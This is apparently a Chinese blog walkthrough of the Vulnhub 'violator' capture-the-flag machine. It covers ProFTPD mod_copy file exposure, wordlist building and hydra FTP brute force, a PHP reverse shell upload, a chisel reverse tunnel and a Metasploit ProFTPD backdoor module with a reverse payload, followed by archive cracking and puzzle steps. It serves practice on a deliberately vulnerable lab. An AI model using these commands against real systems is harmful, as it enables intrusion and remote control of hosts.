[Vulnhub] violator ProFTPD+权限提升

最新推荐文章于 2024-07-17 09:11:25 发布
最新推荐文章于 2024-07-17 09:11:25 发布
阅读量238 收藏 3
点赞数 3
分类专栏: Vulnhub 文章标签: bash
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/140443660
版权

信息收集

IP addressOpening Ports
192.168.101.148TCP:21,80,2121

$ nmap -p- 192.168.101.148 --min-rate 1000 -sC -sV

PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5rc3
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: I Say... I say... I say Boy! You pumpin' for oil or somethin'...?
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OS: Unix

ProFTPD 本地权限

ftp> site cpfr /proc/self/root

ftp> site cpto /var/www/html/root

image.png

http://192.168.101.148/root/

image-1.png

http://192.168.101.148/root/etc/passwd

image-2.png

$ cewl -v 'https://en.wikipedia.org/wiki/Violator_(album)' -d 1 -w violator.txt
$ sed 's/ //g' violator.txt > violator_nospaces
$ cut -d'"' -f2 violator_nospaces | tr '[:upper:]' '[:lower:]' > password.txt

$ hydra -L username.txt -P password.txt ftp://192.168.101.148

username:af
password:enjoythesilence

username:dg
password:policyoftruth

image-3.png

$ cp /usr/share/webshells/php/php-reverse-shell.php /var/www/html

(dg)$ ftp 192.168.101.148

(dg)ftp> put /var/www/html/php-reverse-shell.php

http://192.168.101.148/php-reverse-shell.php

image-5.png

ProFTPD backdoor 权限提升

www-data@violator:/$ python -c 'import pty;pty.spawn("/bin/bash")'

www-data@violator:/$ su dg

image-6.png

dg@violator:/$ sudo -l

image-7.png

image-8.png

dg@violator:/$ cat /home/aw/hint

image-9.png

dg@violator:/$ sudo /home/dg/bd/sbin/proftpd

dg@violator:/$ netstat -lnput

image-10.png

telnet 127.0.0.1 2121

image-11.png

echo dg ALL=\(ALL:ALL\) ALL > /tmp/dg

image-12.png

$ chisel server -p 8000 --reverse

dg@violator:/$ ./chisel client 192.168.101.128:8000 R:2121:127.0.0.1:2121&

$ msfconsole
use exploit/unix/ftp/proftpd_133c_backdoor
msf exploit(proftpd_133c_backdoor) > set payload cmd/unix/reverse_perl
msf exploit(proftpd_133c_backdoor) > set lhost 192.168.101.128
msf exploit(proftpd_133c_backdoor) > set rhost 127.0.0.1
msf exploit(proftpd_133c_backdoor) > set rport 2121
msf exploit(proftpd_133c_backdoor) > exploit

image-14.png

cat /root/flag.txt

image-15.png

image-16.png

root@violator:/root# python3 -m http.server 9999

image-17.png

$ rar2john crocs.rar > hash

$ john hash --wordlist=../Desktop/password.txt

password:World in My Eyes

image-18.png

$ unrar x crocs.rar

image-19.png

image-20.png

使用image to ascii 工具来查看图片信息

https://github.com/MartinxMax/ImageToAscii

image-21.png

$ exiftool artwork.jpg

image-22.png

image-23.png

https://www.dcode.fr/enigma-machine-cipher

ONE FINAL CHALLENGE FOR YOU BGHX CONGRATULATIONS FOR THE FOURTH TIME ON SNARFING THE FLAG ON VIOLATOR ILL PRESUME BY NOW YOULL KNOW WHAT I WAS LISTENING TO WHEN CREATING THIS CTF I HAVE INCLUDED THINGS WHICH WERE DELIBERATLY AVOIDING THE OBVIOUS ROUTE INTO KEEP YOU ON YOUR TOES ANOTHER THOUGHT TO PONDER IS THAT BY ABUSING PERMISSIONS YOU ARE ALSO BY DEFINITION A VIOLATOR SHOUTOUTS AGAIN TO VULNHUB FOR HOSTING A GREAT LEARNING TOOL A SPECIAL THANKS GOES TO BENR AND GKNSB FOR TESTING AND TO GTMLK FOR THE OFFER TO HOST THE CTF AGAIN KNIGHTMARE
Мартин.
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Copyright Violator-crx插件
04-06
manifest.json是每个Chrome扩展的核心,它定义了扩展的行为、权限和其他关键信息。安装CRX文件通常需要用户手动操作,将文件拖放到Chrome的扩展管理页面,或者通过开发者模式进行加载。 **编程示例** 在教育环境中...
版权违规者「Copyright Violator」-crx插件
03-13
用其他词替换单词 用“ Puke”代替所有出现的“ Duke”,用作计算机科学课程的范例。 支持语言:English
vulnhub靶机 -- billu: b0x
weixin_46107179的博客
05-11 327
靶机下载地址:下载地址 搭建好环境,进行主机发现靶机的ip地址为192.168.137.147 对其进行nmap扫描,进行端口发现(22,80) 访问80端口,发现是一个登录框,叫我们尝试SQL注入,用简单的弱口令以及sqlmap跑不出来,然后尝试用burp的SQL字典来跑,跑出来了; 这里通过抓包,将其需要爆破的账号密码添加字典,并且选择cluster bomb模式 第一个字典可以选择kali里面自带的Fuzzing里面的SQL字典 第二个字典,可以就用burp自带的字典,自己添加一下键盘上的所有可
提取DC综合report_constrain all violator中big neg slack
zt5169的博客
01-11 564
design compiler
selinux权限之vendor_executes_system_violators属性
Lizune
08-29 1548
Time:20210829 Question:在Android的kernel中,libxxx库中用system函数调用cmd命令,但是无法执行cmd。 Root cause:查看log,用关键字“avc:”发现对应的selinux权限不足。 验证方法: adb root adb shell # 进入手机 getenforce # 查看对应的权限设置enforcing表示拦截,permission表示允许 setenforce 0 # 设置为permission setenforce 1 # 设置为enfo.
OMNI Introducing Social Structure, Norms and Ontologies into Agent Organizations
weixin_33859504的博客
10-11 150
1. Solved Problem OMNI specifies global goals of the system independently from those of the specific agents that populate the system. Both the norms that regulate interaction between agents, as well a...
omp算法matlab代码-L2RTA:http://hongyusu.github.io/L2RTA/
05-27
find_worst_violator_new.c CFLAGS="\$CFLAGS -fopenmp -std=c99" LDFLAGS="\$LDFLAGS -fopenmp" CC="/usr/bin/gcc" 要运行RSTA算法,请尝试在MATLAB中执行以下命令,该命令将在具有5个随机生成树且K最佳列表的
omp算法matlab代码-L2RTA:http://hongyusu.github.io/L2RTA该存储库包含RTA算法和改进的推理算法,
05-27
find_worst_violator_new.c CFLAGS="\$CFLAGS -fopenmp -std=c99" LDFLAGS="\$LDFLAGS -fopenmp" CC="/usr/bin/gcc" 要运行RSTA算法,请尝试在MATLAB中执行以下命令,该命令将在具有5个随机生成树且K最佳列表的
华为话务台配置文件
05-31
华为C&C08交换机是华为公司推出的一款大型程控交换系统,广泛应用于电信运营商和企业通信领域。话务台是整个通信系统中的一个重要组成...理解和掌握这些配置文件,对于保障通信系统的稳定运行和提升服务质量至关重要。
Bash 学习摘录
Liuqz2009的专栏
07-17 683
使用$(…)机制来进行变量赋值(这是一种比后置引用(反引号`)更新的一种方法)。事实上这两种方法都是命令替换的一种形式。
【/etc/profile、~/.bashrc、~/.bash_profile区别以及配置history记录】
weixin_46356409的博客
07-12 1070
文件都是用于配置 shell 环境的脚本文件,但它们的作用范围和加载时机有所不同。要为所有用户设置 Bash 历史记录的条目数为 100,000 条,你需要在系统级别进行配置。假设你希望设置一些全局环境变量,并为每个用户设置一些特定的别名和函数。通过上述步骤,你可以确保所有用户的 Bash 历史记录条目数都设置为 100,000 条。通过这种方式,你可以确保全局配置和用户特定配置都能正确加载和生效。但为了确保这一点,你可以检查或添加以下内容到每个用户的。文件来实现,这样所有用户在登录时都会加载这个配置。
2024年欧洲铝桁架市场主要企业市场占有率及排名.docx
07-17
2024年欧洲铝桁架市场主要企业市场占有率及排名.docx
torchaudio-0.13.1+cpu-cp39-cp39-win_amd64.whl
最新发布
07-17
torchaudio软件包,直接下载下来,通过命令窗口输入:pip install torchaudio-xxx.whl安装就行,再也不怕pip安装timeout了
出入库存盘点表-图表分析-分类查询-Excel模板
07-17
【作品名称】:出入库存盘点表-图表分析-分类查询-Excel模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
torchaudio-0.12.1+cpu-cp37-cp37m-win_amd64.whl
07-17
torchaudio软件包,直接下载下来,通过命令窗口输入:pip install torchaudio-xxx.whl安装就行,再也不怕pip安装timeout了
中南大学机械设计课程设计说明书.doc
07-17
说明书
仓库进销出入库存管理系统(带库存预警)-Excel模版
07-17
【作品名称】:仓库进销出入库存管理系统(带库存预警)-Excel模版 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
集成产品开发(IPD)高层培训.docx
07-17
集成产品开发(IPD)高层培训.docx
def update_time(self): current_time = QTime.currentTime() time_text = current_time.toString('yyyy-MM-dd hh:mm:ss') self.QLabel_32_time_label.setText(time_text)修改上述错误代码
07-23
根据你提供的代码,我注意到有一个错误:`self.QLabel_32_time_label` 应该是 `self.QLabel_7_violator_1_image`。因此,你应该将 `self.QLabel_32_time_label.setText(time_text)` 替换为 `self.QLabel_7_violator_1_image.setText(time_text)`。修改后的代码如下: ```python def update_time(self): current_time = QTime.currentTime() time_text = current_time.toString('yyyy-MM-dd hh:mm:ss') self.QLabel_7_violator_1_image.setText(time_text) ``` 请确保在调用 `update_time()` 方法之前,已经正确创建了 `self.QLabel_7_violator_1_image` QLabel 部件,并将其添加到合适的布局中。另外,确保在调用 `update_time()` 方法时,已经通过定时器或其他方式设置了适当的时间间隔来更新时间。 请注意,上述代码仅用于将时间文本设置为 QLabel 部件的文本。如果你想在 QLabel 中显示图像,请参考之前提供的关于显示图像的解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值